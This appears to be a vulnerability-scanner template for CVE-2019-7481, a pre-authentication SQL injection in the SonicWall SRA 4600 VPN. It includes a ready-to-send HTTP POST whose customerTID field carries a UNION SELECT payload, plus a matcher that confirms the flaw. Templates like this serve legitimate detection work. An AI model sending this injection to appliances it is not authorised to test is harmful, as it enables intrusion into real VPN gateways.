id: CVE-2019-7481 info: name: SonicWall SRA 4600 VPN - SQL Injection author: _darrenmartyn severity: high description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability. reference: - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ - https://nvd.nist.gov/vuln/detail/CVE-2019-7481 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 epss-score: 0.89778 tags: cve,cve2019,sonicwall,sqli,kev metadata: max-request: 1 http: - raw: - | POST /cgi-bin/supportInstaller HTTP/1.1 Host: {{Hostname}} Accept-Encoding: identity User-Agent: MSIE Content-Type: application/x-www-form-urlencoded fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- matchers: - type: word words: - "4220397236" part: body # Enhanced by mp on 2022/04/20